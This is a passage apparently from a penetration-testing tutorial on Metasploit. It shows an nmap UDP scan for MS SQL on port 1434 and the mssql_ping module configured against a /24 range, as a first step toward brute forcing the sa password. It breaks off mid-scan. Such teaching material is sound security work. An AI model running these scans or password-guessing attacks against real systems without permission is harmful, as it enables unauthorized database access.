Meterpreter
To begin, we identify the MS SQL installation and then launch an MS SQL Server brute force attack to see if we can guess a password. By default, MS SQL listens on TCP port 1433 and UDP port 1434, though newer versions allow an instance to be installed on a dynamically allocated TCP port, which can be randomized. Luckily, UDP port 1434 (which we did not scan for) stays the same: the SQL Server Browser service listening there can be queried to identify the dynamic TCP port of each SQL Server instance.
Here, we scan the system and see that MS SQL port 1434 UDP is open:
msf > nmap -sU 192.168.33.130 -p1434
Nmap scan report for 192.168.33.130
Host is up (0.00033s latency).
PORT     STATE SERVICE
1434/udp open  ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
msf >
As you can see, we scan our host and see that MS SQL UDP port 1434 is open. (Chapters 11, 13, and 17 will cover MS SQL in much more depth.)
When targeting MS SQL, we can leverage the mssql_ping module to query UDP port 1434 across an address range and enumerate each SQL Server instance, including the TCP port it is listening on; credential guessing against that TCP port is then done with the scanner/mssql/mssql_login module. Every MS SQL installation has an sa, or system administrator, login, and when mixed-mode authentication is enabled the installer requires the administrator to set its password. You'll often be able to guess or brute force the sa account password, because administrators installing this application frequently do not understand the security ramifications of choosing a blank password or something too simple.
In the next example, we look for the mssql_ping module and use it to find the SQL Server instances whose sa account we can then attempt to brute force:
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   THREADS   1                yes       The number of concurrent threads
   USERNAME  sa               no        The username to authenticate as

msf auxiliary(mssql_ping) > set RHOSTS 192.168.33.1/24
RHOSTS => 192.168.33.1/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
[*] Scanned 040 of 256 hosts (015% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 080 of 256 hosts (031% complete)
[*] Scanned 115 of 256 hosts (044% complete)